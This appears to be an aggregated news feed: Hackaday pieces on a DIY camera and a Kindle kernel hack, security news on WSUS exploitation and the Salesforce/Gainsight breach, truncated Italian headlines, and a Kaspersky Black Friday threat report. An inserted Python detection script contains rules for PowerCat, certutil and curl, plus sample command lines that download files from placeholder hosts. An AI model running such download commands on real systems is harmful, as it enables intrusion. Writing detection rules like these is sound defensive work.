Build Yourself a Medium-Format Camera
Medium format cameras have always been a step up from those built in the 35 mm format. By virtue of using a much larger film, they offer improved resolution and performance. If you want a medium format film camera, you can always hunt for some nice vintage gear. Or, you could build one from scratch — like the MRF2 from [IDENTIDEM.design].
The MRF2 might be a film camera, but in every other way, it’s a thoroughly modern machine. It’s a rangefinder design, relying on a DTS6012M LIDAR time-of-flight sensor to help ensure your shots are always in sharp focus. An ESP32 is responsible for running the show, and it’s hooked up to OLED displays in the viewfinder and on the body to show status info. The lens is coupled with a linear position sensor for capturing accurate shots, there’s a horizon indicator in the viewfinder, and there’s also a nice little frame counter using a rotary encoder to track the film.
Shots from a prototype on Instagram show that this camera can certainly pull off some beautiful shots. We love a good camera build around these parts. You can even make one out of a mouse if you’re so inclined.
The Unexpected Joys Of Hacking an Old Kindle
In the closing hours of JawnCon 0x2, I was making a final pass of the “Free Stuff for Nerds” table when I noticed a forlorn Kindle that had a piece of paper taped to it. The hand-written note explained that the device was in shambles — not only was its e-ink display visibly broken, but the reader was stuck in some kind of endless boot loop. I might have left it there if it wasn’t for the closing remark: “Have Fun!”
Truth is, the last thing I needed was another Kindle. My family has already managed to build up a collection of the things. But taking a broken one apart and attempting to figure out what was wrong with it did seem like it would be kind of fun, as I’d never really had the opportunity to dig into one before. So I brought it home and promptly forgot about it as Supercon was only a few weeks away and there was plenty to keep me occupied.
The following isn’t really a story about fixing a Kindle, although it might seem like it on the surface. It’s more about the experience of working on the device, and the incredible hacking potential of these unassuming gadgets. Whether you’ve got a clear goal in mind, or just want to get your hands dirty in the world of hardware hacking, you could do far worse than picking a couple of busted Kindles up for cheap on eBay.
If there’s a singular takeaway, it’s that the world’s most popular e-reader just so happens to double as a cheap and impressively capable embedded Linux development environment for anyone who’s willing to crack open the case.
Getting Connected
We start with what’s essentially Hardware Hacking 101: the hidden serial debug port. It’s the sort of thing you learn to look for when taking apart a new gadget, and unsurprisingly, it’s also at the heart of Kindle hacking. While there are plenty of software modifications you can do depending on the age and version of your particular Kindle, opening up the case and tapping into the serial port is always the most direct way to gain access to the system.
From my research, every Kindle (with the possible exception of the very latest models from the 2020s) has an unpopulated serial port on the board. In the case of this Kindle Paperwhite 2 from 2013, it’s even labeled. I simply soldered on some jumper wires and ran them out to a pin header to make connecting to it a little less fiddly. The only thing to watch out for is the voltage; it seems that the serial port on the majority of Kindles is 1.8 V, and connecting up a higher voltage USB-serial adapter without a level shifter could release the Magic Smoke.
With the hardware connected and my favorite serial communications tool running, it was easy to see what ailed this particular Kindle. As evidenced by the final few lines of the kernel messages, a failure of one of the voltage regulators in the MAX77696 — a power management IC designed specifically for e-ink readers — was preventing the driver module from loading fully. This in turn was triggering a reboot, presumably because some sort of watchdog routine was in place to bail out if any critical hardware issues were detected.
On the Hunt
Coming from the “normal” Linux world, the solution seemed easy enough. Since the screen was toast anyway, all I needed to do to get the Kindle booting was to prevent the kernel module from loading. That way I could at least use it for something, perhaps an energy efficient minimalist server.
But according to the MAX77696 datasheet, the chip was responsible for quite a bit more than simply driving the e-ink panel. If I pulled the kernel module entirely, there was a good chance I’d also lose features like the real-time clock and the ability to read the battery voltage as well. So I decided to change tactics: rather than keeping the driver from loading, I’d take out the watchdog that was forcing the system to reboot. But where was it?
Amazon makes it easy to manually download the latest firmware for each member of the Kindle family, and the aptly named KindleTool lets you manipulate them. In this case I used the extract function to pull out the root filesystem image, which I could then locally mount as a basic EXT3 volume.
That was refreshingly straightforward, but unfortunately didn’t get me where I needed to go. Using grep to search all the files within the filesystem for the string “failed to load eink driver” showed no hits. If the watchdog wasn’t in the root filesystem, then where was it?
Unpacking the firmware update with KindleTool also got me the kernel image, and running Binwalk against it showed there was a compressed filesystem at 0x466C. I reasoned this must be an initramfs — essentially a minimal Linux system that lives in RAM and gives the kernel a place to work as it brings up the rest of the system. If the system has some self-check capability, it’s reasonable to assume that’s where it lives.
After drilling down a few times with Binwalk’s extract function, I was able to get to the contents of the initramfs. Sure enough, another search for the error message revealed our sentinel: /bin/recovery-util.
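As an added illustration (not code from the original article), this Python sketch mirrors the search described above: it scans an image for gzip streams the way Binwalk flags them, unpacks the newc cpio archive inside, and reports which member contains the error string. The sample image, its file contents and the single gzip-then-cpio layering are constructed assumptions; a real Kindle kernel may nest or compress its initramfs differently.

```python
import gzip
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"   # gzip signature followed by the "deflate" method byte
CPIO_NEWC = b"070701"          # magic of the "newc" cpio format used for Linux initramfs
NEEDLE = b"failed to load eink driver"   # error string quoted in the article


def find_gzip_streams(blob):
    """Return [(offset, decompressed_bytes)] for every offset holding a valid gzip stream."""
    found = []
    pos = blob.find(GZIP_MAGIC)
    while pos != -1:
        inflater = zlib.decompressobj(wbits=zlib.MAX_WBITS | 16)  # |16 selects gzip framing
        try:
            data = inflater.decompress(blob[pos:])
        except zlib.error:
            data = b""             # the three magic bytes occurred by chance
        if data and inflater.eof:  # keep only streams that ran to a clean end
            found.append((pos, data))
        pos = blob.find(GZIP_MAGIC, pos + 1)
    return found


def align4(n):
    """cpio newc pads names and file data to 4-byte boundaries."""
    return (n + 3) & ~3


def parse_cpio_newc(archive):
    """Yield (path, content) for each member of a newc cpio archive."""
    off = 0
    while archive[off:off + 6] == CPIO_NEWC and off + 110 <= len(archive):
        # 13 fields of 8 ASCII hex digits follow the 6-byte magic
        fields = [int(archive[off + 6 + 8 * i: off + 14 + 8 * i], 16) for i in range(13)]
        filesize, namesize = fields[6], fields[11]
        name = archive[off + 110: off + 110 + namesize - 1].decode("utf-8", "replace")
        data_start = align4(off + 110 + namesize)
        if name == "TRAILER!!!":   # end-of-archive marker
            break
        yield name, archive[data_start: data_start + filesize]
        off = align4(data_start + filesize)


def cpio_member(path, content, mode=0o100755):
    """Build one newc member; used only to construct the sample image below."""
    name = path.encode() + b"\0"
    fields = [0, mode, 0, 0, 1, 0, len(content), 0, 0, 0, 0, len(name), 0]
    head = CPIO_NEWC + b"".join(b"%08X" % f for f in fields) + name
    head += b"\0" * (-len(head) % 4)
    return head + content + b"\0" * (-len(content) % 4)


def build_sample_image():
    """Constructed stand-in for a kernel image with an initramfs at 0x466C."""
    initramfs = (
        cpio_member("bin/busybox", b"\x7fELF constructed placeholder")
        + cpio_member("bin/recovery-util", b"\x7fELF constructed " + NEEDLE + b"\n")
        + cpio_member("TRAILER!!!", b"", mode=0)
    )
    decoy = b"\0" * 0x100 + GZIP_MAGIC + b"\xff" * 16   # magic bytes with no stream behind them
    return decoy.ljust(0x466C, b"\0") + gzip.compress(initramfs, mtime=0) + b"\0" * 64


def locate_string(image, needle):
    """Return [(gzip_offset, member_path)] for archive members that contain `needle`."""
    return [(offset, path)
            for offset, payload in find_gzip_streams(image)
            for path, content in parse_cpio_newc(payload)
            if needle in content]


if __name__ == "__main__":
    for offset, path in locate_string(build_sample_image(), NEEDLE):
        print(f"gzip stream at {offset:#x}: /{path}")
```

The decoy bytes show why a signature match alone is not enough: only offsets that decompress to a clean end are treated as embedded filesystems.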
New Kernel, Who Dis?
I had considered trying to simply remove the recovery-util program from the kernel image, but since I wasn’t 100% sure how the whole watchdog system functioned, there was no guarantee that would have worked without more trial and error. So, emboldened by how well this was all going for me so far, I took the nuclear option and decided to rebuild the kernel with my own initramfs.
It’s here that the Kindle software environment, and the community around it, really started to shine. Once again, Amazon made it ridiculously easy to get the source code for the exact firmware I was working with, and the community provided an actively maintained toolchain to build it with. A little more searching even pulled up some pre-compiled builds that were ready to use.
Actually building the kernel for the Kindle was essentially the same process as doing it on my desktop computer, with the notable addition of supplying the location of the cross compiler into each make command. But if I ever got off track, there were plenty of write-ups online to reference. I even found one that went over building a custom initramfs with BusyBox that doesn’t include any of Amazon’s programs.
But perhaps the best part was that, once I had compiled Amazon’s modified kernel and built my initramfs, installing it on the Kindle was as simple as using a modified version of Android’s fastboot command. There were no cryptographic hoops to jump through; you just give it the new kernel and away it goes. It’s my understanding that newer Kindles might not be so understanding, but with at least the hardware of this vintage, there’s nothing stopping you from doing whatever you want.
Pocket Penguin Playground
With the source code, tools, and knowledge floating around out there, I was able to build my own kernel and initramfs that lets me boot into a full Linux environment on what was previously a non-functional Kindle. There are a few things I haven’t gotten to work yet, but I believe that’s largely because I’m still using the root filesystem provided by Amazon.
Now that I know how easy it is to work with Linux on the Kindle, I’m looking to push further and put together my own stripped-down environment without any of Amazon’s frameworks installed. Given how ridiculously cheap early Kindles are on the second hand market — especially if they have a busted screen — there are all sorts of tasks that I could see them performing if I had a solid base to build on.
Make no mistake, I’m greatly appreciative of the fact that we now have mature single-board computers like the Raspberry Pi available for a reasonable cost. But taking what’s essentially consumer e-waste and turning it into a useful platform for learning and experimentation is the true hacker way. So whether you’ve got a Kindle collecting dust somewhere at home, or end up grabbing a few off of eBay for a song, I invite you to bust out the USB-serial adapter and start exploring.
Digital Surveillance of Workers Is Coming: Move Your Mouse Faster!
Remote work gave employees freedom, but digital surveillance came with it.
We covered this some time ago in an article reporting that such monitoring tools are also coming to Microsoft Teams. So, in place of the boss's fixed stare, this role will increasingly be played by “algorithms” that monitor how long applications stay open, which websites are visited, and how actively the mouse is moved and the keys are pressed.
Advanced systems even analyze facial expressions and the way employees walk in front of a webcam. But these tools at the same time highlight the inherent limits of collecting personal data.
However, many workers see such monitoring not as a sign of concern but as distrust and a violation of privacy. Surveys and data from the American Psychological Association link constant surveillance to increased stress, worse psycho-emotional well-being, and the desire to leave the job.
The requirement to transmit webcam images or sensitive medical information is felt particularly acutely. People ask for clear explanations of why the data is collected and with whom it may be shared.
The cold gaze of the algorithms is no less dangerous. The programs lack context and easily mistake phone calls or paperwork for inactivity. This leads employees to fake frantic activity for the sake of performance indicators, and experts at the US National Employment Law Project have documented cases of unjustified penalties that are hard to contest when the decision is effectively made by the system.
In warehouses and logistics, where every movement is digitized, the pressure is especially intense: the rush to meet quotas results in physical pain, fatigue, and burnout. According to NELP, digital surveillance also affects workers' rights, hindering worker organizing and giving companies a tool for early detection of union activity under the pretext of analyzing other metrics.
The rules of the game are changing slowly. In the United States, employers are required to give notice of data collection, but these requirements are limited, so states are trying to introduce safeguards of their own. California is discussing a ban on systems that recognize emotions, gait, or facial expressions and pass data to third parties.
Meanwhile, Massachusetts is advancing legislation that would protect workers from abuse of digital surveillance. At the same time, federal authorities are seeking a unified approach to regulating artificial intelligence, which could weaken local initiatives. As a result, interest is growing in collective bargaining as a viable means of fighting excessive surveillance.
Advocates of a more cautious approach insist that such tools are meaningful only when they help identify general trends and improve processes, rather than turning people into metrics. Where respect, autonomy, and safe working conditions persist, productivity emerges naturally, without an omnipresent camera checking every move.
The article Digital Surveillance of Workers Is Coming: Move Your Mouse Faster! comes from Red Hot Cyber.
Global attacks reach 24 trillion dollars: how to defend yourself in the era of Agentic AI
Gartner has identified enterprise Agentic AI as the top strategic technology trend for 2025, with projected growth of 46.2% from 2025 to 2030. But the challenges are numerous. Here is what Microsoft foresees
Microsoft Fixes the WSUS Bug, but Chinese Hackers Get There First
A recently patched vulnerability in Microsoft's Windows Server Update Services has led to a series of attacks using one of the best-known espionage tools of recent years.
The incidents show how quickly attackers can go from studying a published exploit to actively exploiting the vulnerability to penetrate infrastructure.
According to the South Korean company AhnLab, an unknown group gained access to Windows servers running WSUS by exploiting the vulnerability CVE-2025-59287. The vulnerability was used to run standard system utilities, allowing the attackers to contact an external server and download malicious code.
Before the main tool was installed, the PowerCat utility was used, which gave the attackers a remote command prompt. Then, using certutil and curl, ShadowPad was installed on the system.
This program is considered an evolution of PlugX and has long been used by entities linked to China. Its architecture is modular, and it is launched through library substitution.
A DLL file, located in memory and responsible for executing the main content, is loaded into the legitimate file ETDCtrlHelper.exe. Inside it is a module that loads additional components and uses stealth and persistence mechanisms.
Microsoft patched CVE-2025-59287 a month ago. The bug is rated critical because it allows arbitrary code execution with system privileges. After a proof-of-concept exploit was released, many groups began mass-scanning accessible WSUS servers, gaining initial access, performing reconnaissance, and downloading both malicious files and legitimate administration tools. According to AhnLab, this is how ShadowPad was deployed on the servers.
The incident clearly showed that every vulnerability becomes a real threat if its remediation is delayed. The faster identified problems are addressed, the lower the likelihood that attackers will manage to infiltrate the infrastructure and turn a failure into a full-blown crisis.
The article Microsoft Fixes the WSUS Bug, but Chinese Hackers Get There First comes from Red Hot Cyber.
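An added detection example, not part of the original article: it runs the tool chain described above (PowerCat, certutil, curl, ETDCtrlHelper.exe) as rules over process-creation events and raises severity when the process descends from a WSUS worker. The event fields, the sample events and the WSUS process names w3wp.exe and wsusservice.exe are assumptions, not details taken from AhnLab's report.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumption (not stated in the article): WSUS request handling runs in these processes.
WSUS_PROCESSES = {"w3wp.exe", "wsusservice.exe"}
URL = re.compile(r"https?://", re.IGNORECASE)
CURL_TO_DISK = re.compile(r"(?:^|\s)(?:-o|-O|--output|--remote-name)(?:\s|$)")


def match_rules(event):
    """Return the names of the rules one process-creation event matches."""
    image = basename(event["image"]).lower()
    cmd = event["cmdline"]
    rules = []
    if image == "certutil.exe" and URL.search(cmd):
        rules.append("certutil-remote-fetch")      # certificate tool used as a downloader
    if image == "curl.exe" and URL.search(cmd) and CURL_TO_DISK.search(cmd):
        rules.append("curl-download-to-disk")
    if image in ("powershell.exe", "pwsh.exe") and "powercat" in cmd.lower():
        rules.append("powercat-invocation")
    if image == "etdctrlhelper.exe":
        # Named in the article as the legitimate executable the DLL is loaded into;
        # any execution on a WSUS server is worth reviewing.
        rules.append("etdctrlhelper-exec")
    return rules


def has_wsus_ancestor(event, by_pid):
    """Walk the parent chain; True if any ancestor is a WSUS worker process."""
    seen = set()                       # guards against loops caused by PID reuse
    ppid = event["ppid"]
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        parent = by_pid[ppid]
        if basename(parent["image"]).lower() in WSUS_PROCESSES:
            return True
        ppid = parent["ppid"]
    return False


def detect(events):
    """Return [(pid, rule, severity)]; 'high' when the process descends from WSUS."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        for rule in match_rules(e):
            severity = "high" if has_wsus_ancestor(e, by_pid) else "medium"
            findings.append((e["pid"], rule, severity))
    return findings


# Constructed sample events (hosts, paths and arguments are placeholders).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": "w3wp.exe -ap WsusPool"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c <redacted>"},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Import-Module .\\powercat.ps1; <redacted>"},
    {"pid": 220, "ppid": 200, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://files.example.invalid/a.tmp a.tmp"},
    {"pid": 230, "ppid": 200, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe http://files.example.invalid/b.tmp -o b.tmp"},
    {"pid": 240, "ppid": 200, "image": r"C:\ProgramData\sample\ETDCtrlHelper.exe",
     "cmdline": "ETDCtrlHelper.exe"},
    {"pid": 50, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 300, "ppid": 50, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -hashfile update.cab SHA256"},          # routine admin use
    {"pid": 310, "ppid": 50, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://intranet.example.invalid/health"},  # no file written
    {"pid": 320, "ppid": 50, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f https://intranet.example.invalid/ca.crt ca.crt"},
]

if __name__ == "__main__":
    for pid, rule, severity in detect(SAMPLE_EVENTS):
        print(f"{severity:6} pid={pid} {rule}")
```

The same certutil command scores "medium" from an interactive admin shell and "high" under the WSUS worker, which is the distinction that keeps the rule usable on servers where administrators run these tools legitimately.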
ShinyHunters Seeks Disloyal Employees as the Gainsight Salesforce Case Widens
The growing data leak from the Salesforce ecosystem took a new turn after the ShinyHunters group announced its involvement in the incident. The events have been under way for several months, affecting various services tied to CRM platforms, and the scope of the impact continues to grow.
ShinyHunters claims to have gained access to Gainsight several months ago, taking advantage of capabilities acquired through a hack of the Salesloft Drift integration. At that time, unknown individuals had infiltrated Salesloft's GitHub account and extracted the OAuth tokens used by the third-party service Drift with Salesforce. These tokens allowed them to stealthily access the data of a large number of corporate customers.
Reportedly, the same campaign also compromised Gainsight. This service operates as a customer process management platform and is connected to Salesforce, HubSpot, and support systems such as Zendesk.
The incident prompted the company to bring in specialists from Google Mandiant to investigate the nature of the activity and the origin of the problem. Gainsight maintains that the unwanted activity occurred through connections to external applications, not because of a bug in the Salesforce platform itself.
In response, Salesforce revoked all active access keys for Gainsight apps and temporarily removed them from AppExchange. Zendesk and HubSpot took similar measures, limiting the functionality of their respective connectors pending an internal review. Salesforce representatives declined to comment in detail but stressed that the measures were taken immediately.
According to the Google Threat Intelligence Group, the attack is linked to the group UNC6240, also known as ShinyHunters. The company identified more than two hundred affected Salesforce instances. The source of the compromise is believed to be the stolen OAuth tokens, which allowed the attackers to access third-party services and their integrations.
ShinyHunters members claim to have tested the level of monitoring in Gainsight's systems and that the illegal activity was detected roughly one to two weeks after the intrusions began. The group also says it is looking for accomplices inside large companies. Salesforce had previously stated that it would not give in to the extortionists' demands and would not negotiate.
The article ShinyHunters Seeks Disloyal Employees as the Gainsight Salesforce Case Widens comes from Red Hot Cyber.
Police law amendment: Saxony wants to use drones to film into moving cars without cause
Europe Looks to Monfalcone for the Maritime Industry's New Course
In the midst of the redefinition of European industrial policies, the visit by the Commissioner for Sustainable Transport and Tourism, Apostolos Tzitzikostas, to the Fincantieri shipyard in Monfalcone took on the value of a precise political signal. The Friulian site, for years
If Geopolitics Outgrows the Tools of the First Republic. Camporini's Commentary
Last week the Supreme Defense Council met, a body of constitutional significance (art. 87 of the Constitution), “constituted according to the law”, a law that was passed on 28 July 1950, with wording that does not provide full clarity
Sarajevo and the Business of the Siege: The Story of an Inhuman Tourism
The role of mercenaries, European extremists, and paying visitors in the economic and political balance of the siege of Sarajevo.
The article Sarajevo and the Business of the Siege: pagineesteri.it/2025/11/24/mon…
Santopadre: “Winning the Davis Cup was not a given. Berrettini has found the right energy again and now he can't be stopped”
ROME – Italy has won the Davis Cup for the third edition in a row. Vincenzo Santopadre, former coach of Matteo Berrettini and new coach of Lorenzo Sonego, tells Lumsanews…
The article Santopadre:
Ukraine, a possible turning point. Trump: “Something good will happen”. Drone alert in Moscow: three airports closed
BRUSSELS – From the use of frozen Russian assets to finance Ukraine's reconstruction process to security guarantees for Kyiv similar to those contained in NATO's Article 5. These are just…
The article Ukraine,
Ukraine, peace talks continue in Geneva (Il Fatto del giorno)
Edited by Alessio Garzina
The article Ukraine, peace talks continue in Geneva (Il Fatto del giorno) on Lumsanews.
Ustica, the center-left mobilizes to say no to closing the case (Il Fatto del Giorno)
Edited by Lorenzo Giovanardi
The article Ustica, the center-left mobilizes to say no to closing the case (Il Fatto del Giorno) on lumsanews.it/ustica-il-centros…
Why the Spanish economy is going so strong
More than double the European average: and one of the reasons is that on immigration they do the opposite of what everyone else does. Il Post
The anti-spam filter works: nearly 10 million calls blocked per day
ROME – The filter against spam calls from fake Italian mobile numbers works: nearly 10 million calls blocked per day. Since 19 November 2025, Agcom has been preventing nuisance call centers…
The article The anti-spam filter works: nearly 10 million calls blocked per day on
Rome, major raid on the Roma camp in via dei Gordiani: 18 arrests. They robbed the elderly
ROME – Thefts, threats, and violence. This was the modus operandi of the gang broken up today – 24 November – by the Carabinieri, who arrested 18 people. The investigation established the existence…
The article Rome, major raid on the Roma camp in via dei Gordiani: 18 arrests.
Ornella Vanoni, the endless farewell to the queen of song: thousands queue for the lying in state. Funeral awaited
MILAN – The last farewell to Ornella Vanoni. For it, the lying in state at the Piccolo Teatro in Milan reopened, where until 1 p.m. today (24 November) it was possible…
The article Ornella
China, high tension with Japan: “Risk of military clash”. Tokyo deploys missiles near Taiwan
BEIJING – Sparks between China and Japan. The deployment of Japanese “offensive weapons” on its southwestern islands “close to China's Taiwan region is a deliberate attempt to create…
The article China, high tension with
Moody’s upgrades Italy after 23 years and raises its rating. Giorgetti: “Confidence in the government”
After nearly a quarter of a century, Moody's upgrades Italy's sovereign rating from Baa3 – the lowest level of investment grade – to Baa2
The article Moody’s upgrades Italy after 23 years and raises its rating. Giorgetti: “Confidence in the government” on Lumsanews.
Barazzutti: “The Davis Cup remains a great competition even without the top players. But I preferred the old format”
ROME – Corrado Barazzutti, coach and former tennis player, is considered one of the strongest Italian tennis players of all time, world number 7 and Italian number 1 for 198 weeks. In…
The article Barazzutti: “The Davis Cup remains a great
Regional elections, turnout falls: 13 million Italians called to the polls in Veneto, Campania, and Puglia
ROME – Polling stations have reopened in Veneto, Campania, and Puglia, where about 13 million voters are called to vote until Monday afternoon to choose the governors…
The article Regional elections, turnout falls: 13 million Italians called to the polls
Garofani case, La Russa: “I believe the Quirinale adviser should resign”
ROME – The case of the adviser to the President of the Republic, Francesco Saverio Garofani, flares up again after the two statements by Senate President Ignazio La Russa, who spoke at the event “Italia Direzione…
The article Garofani case, La Russa: “I believe the
Milan hosts the preview of the film that tells the story of Fatma Hassona
articolo21.org/2025/11/milano-…
“Targeted killings”. The President of the Order of Journalists, Carlo Bartoli, uses clear words to describe the hundreds of Palestinian reporters killed in
A plan for next year's G20
IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and am wishing everyone a happy Thanksgiving later this week. For those who don't do 'Turkey Day,' a reminder: it's a month until Festivus.
— The United States takes over the G20 presidency in 2026. On tech, it's time other countries stepped up to fill the void.
— Washington wants to stop US states from passing AI legislation despite Alabama to Wisconsin becoming a testing ground for digital rulemaking.
— Internet freedoms worldwide have declined progressively over the last 15 years.
Let's get started
To buy or not to buy: How cybercriminals capitalize on Black Friday
The global e‑commerce market is accelerating faster than ever before, driven by expanding online retail, and rising consumer adoption worldwide. According to McKinsey Global Institute, global e‑commerce is projected to grow by 7–9% annually through 2040.
At Kaspersky, we track how this surge in online shopping activity is mirrored by cyber threats. In 2025, we observed attacks which targeted not only e‑commerce platform users but online shoppers in general, including those using digital marketplaces, payment services and apps for everyday purchases. This year, we additionally analyzed how cybercriminals exploited gaming platforms during Black Friday, as the gaming industry has become an integral part of the global sales calendar. Threat actors have been ramping up their efforts during peak sales events like Black Friday, exploiting high demand and reduced user vigilance to steal personal data, funds, or spread malware.
This report continues our annual series of analyses published on Securelist in 2021, 2022, 2023, and 2024, which examine the evolving landscape of shopping‑related cyber threats.
Methodology
To track how the shopping threat landscape continues to evolve, we conduct an annual assessment of the most common malicious techniques, which span financial malware, phishing pages that mimic major retailers, banks, and payment services, as well as spam campaigns that funnel users toward fraudulent sites. In 2025, we also placed a dedicated focus on gaming-related threats, analyzing how cybercriminals leverage players’ interest. The threat data we rely on is sourced from the Kaspersky Security Network (KSN), which processes anonymized cybersecurity data shared consensually by Kaspersky users. This report draws on data collected from January through October 2025.
Key findings
- In the first ten months of 2025, Kaspersky identified nearly 6.4 million phishing attacks which targeted users of online stores, payment systems, and banks.
- As many as 48.2% of these attacks were directed at online shoppers.
- We blocked more than 146,000 Black Friday-themed spam messages in the first two weeks of November.
- Kaspersky detected more than 2 million phishing attacks related to online gaming.
- Around 1.09 million banking-trojan attacks were recorded during the 2025 Black Friday season.
- The number of attempted attacks on gaming platforms surged in 2025, reaching more than 20 million, a significant increase compared to previous years.
- More than 18 million attempted malicious attacks were disguised as Discord in 2025, a more than 14-time increase year-over-year, while Steam remained within its usual five-year fluctuation range.
Shopping fraud and phishing
Phishing and scams remain among the most common threats for online shoppers, particularly during high-traffic retail periods when users are more likely to act quickly and rely on familiar brand cues. Cybercriminals frequently recreate the appearance of legitimate stores, payment pages, and banking services, making their fraudulent sites and emails difficult to distinguish from real ones. With customers navigating multiple offers and payment options, they may overlook URL or sender details, increasing the likelihood of credential theft and financial losses.
From January through to October 2025, Kaspersky products successfully blocked 6,394,854 attempts to access phishing links which targeted users of online stores, payment systems, and banks. Breaking down these attempts, 48.21% had targeted online shoppers (for comparison, this segment accounted for 37.5% in 2024), 26.10% targeted banking users (compared to 44.41% in 2024), and 25.69% mimicked payment systems (18.09% last year). Compared to previous years, there has been a noticeable shift in focus, with attacks against online store users now representing a larger share, reflecting cybercriminals’ continued emphasis on exploiting high-demand retail periods, while attacks on banking users have decreased in relative proportion. This may be related to online banking protection hardening worldwide.
Financial phishing attacks by category, January–October 2025
In 2025, Kaspersky products detected and blocked 606,369 phishing attempts involving the misuse of Amazon’s brand. Cybercriminals continued to rely on Amazon-themed pages to deceive users and obtain personal or financial information.
Other major e-commerce brands were also impersonated. Attempts to visit phishing pages mimicking Alibaba brands, such as AliExpress, were detected 54,500 times, while eBay-themed pages appeared in 38,383 alerts. The Latin American marketplace Mercado Libre was used as a lure in 8,039 cases, and Walmart-related phishing pages were detected 8,156 times.
Popular online stores mimicked by scammers, January–October 2025
In 2025, phishing campaigns also extensively mimicked other online platforms. Netflix-themed pages were detected 801,148 times, while Spotify-related attempts reached 576,873. This pattern likely reflects attackers’ continued focus on high-traffic digital entertainment services with in-service payments enabled, which can be monetized via stolen accounts.
How scammers exploited shopping hype in 2025
In 2025, Black Friday-related scams continued to circulate across multiple channels, with fraudulent email campaigns remaining one of the key distribution methods. As retailers increase their seasonal outreach, cybercriminals take advantage of the high volume of promotional communications by sending look-alike messages that direct users to scam and phishing pages. In the first two weeks of November, 146,535 spam messages connected to seasonal sales were detected by Kaspersky, including 2,572 messages referencing Singles' Day sales.
Scammers frequently attempt to mimic well-known platforms to increase the credibility of their messages. In one of the recurring campaigns, a pattern seen year after year, cybercriminals replicated Amazon’s branding and visual style, promoting supposedly exclusive early-access discounts of up to 70%. In this particular case, the attackers made almost no changes to the text used in their 2024 campaign, again prompting users to follow a link leading to a fraudulent page. Such pages are usually designed to steal their personal or payment information or to trick the user into buying non-existent goods.
Beyond the general excitement around seasonal discounts, scammers also try to exploit consumers’ interest in newly released Apple devices. To attract attention, they use the same images of the latest gadgets across various mailing campaigns, just changing the names of legitimate retailers that allegedly sell the brand.
Scammers use an identical image across different campaigns, only changing the retailer’s branding
As subscription-based streaming platforms also take part in global sales periods, cybercriminals attempt to take advantage of this interest as well. For example, we observed a phishing website where scammers promoted an offer for a “12-month subscription bundle” covering several popular services at once, asking users to enter their bank card details. To enhance credibility, the scammers also include fabricated indicators of numerous successful purchases from other “users,” making the offer appear legitimate.
In addition to imitating globally recognized platforms, scammers also set up fake pages that pretend to be local services in specific countries. This tactic enables more targeted campaigns that blend into the local online landscape, increasing the chances that users will perceive the fraudulent pages as legitimate and engage with them.
Non-existent Norwegian online store and popular Labubu toys sale
Banking Trojans
Banking Trojans, or “bankers,” are another tool for cybercriminals exploiting busy shopping seasons like Black Friday in 2025. They are designed to steal sensitive data from online banking and payment systems. In this section, we’ll focus on PC bankers. Once on a victim’s device, they monitor the browser and, when the user visits a targeted site, can use techniques like web injection or form-grabbing to capture login credentials, credit card information, and other personal data. Some trojans also watch the clipboard for crypto wallet addresses and replace them with those controlled by the malicious actors.
As online shopping peaks during major sales events, attackers increasingly target e-commerce platforms alongside banks. Trojans may inject fake forms into legitimate websites, tricking users into revealing sensitive data during checkout and increasing the risk of identity theft and financial fraud. In 2025, Kaspersky detected over 1,088,293* banking Trojan attacks. Notable banker-related cases analysed by Kaspersky throughout the year include campaigns involving the new Maverick banking Trojan, distributed via WhatsApp, and the Efimer Trojan, which spread through malicious emails and compromised WordPress sites. Both illustrate how diverse and adaptive banking Trojan delivery methods are.
*These statistics include globally active banking malware, and malware for ATMs and point-of-sale (PoS) systems. We excluded data on Trojan-banker families that no longer use banking Trojan functionality in their attacks, such as Emotet.
A holiday sales season on the dark web
Apparently, even the criminal underground follows its own version of a holiday sales season. Once data is stolen, it often ends up on dark-web forums, where cybercriminals actively search for buyers. This pattern is far from new, and the range of offers has remained largely unchanged over the past two years.
Threat actors consistently seize the opportunity to attract “new customers,” advertising deep discounts tied to high-profile global sales events. It is worth noting that year after year we see the same established services announce their upcoming promotions in the lead-up to Black Friday, almost as if operating on a retail calendar of their own.
We also noted that dark web forum participants themselves eagerly await these seasonal markdowns, hoping to obtain databases at the most favorable rates and expressing their wishes in forum posts. In the months before Black Friday, posts began appearing on carding-themed forums advertising stolen payment-card data at promotional prices.
Threats targeting gaming
The gaming industry faces a high concentration of scams and other cyberthreats due to its vast global audience and constant demand for digital goods, updates, and in-game advantages. Players often engage quickly with new offers, making them more susceptible to deceptive links or malicious files. At the same time, the fact that gamers often download games, mods, skins etc. from third-party marketplaces, community platforms, and unofficial sources creates additional entry points for attackers.
The number of attempted attacks on platforms beloved by gamers increased dramatically in 2025, reaching 20,188,897 cases, a sharp rise compared to previous years.
Attempts to attack users through malicious or unwanted files disguised as popular gaming platforms
The nearly sevenfold increase in 2025 is most likely linked to the blocking of Discord that some countries introduced at the end of 2024. Users eventually came to rely on alternative tools, proxies and modified clients. This change significantly expanded the attack surface, making users more vulnerable to fake installers and malicious updates disguised as workarounds for the restriction.
It can also be seen in the top five most targeted gaming platforms of 2025:
| Platform | The number of attempted attacks |
| --- | --- |
| Discord | 18,556,566 |
| Steam | 1,547,110 |
| Xbox | 43,560 |
| Uplay | 28,366 |
| Battle.net | 5,538 |
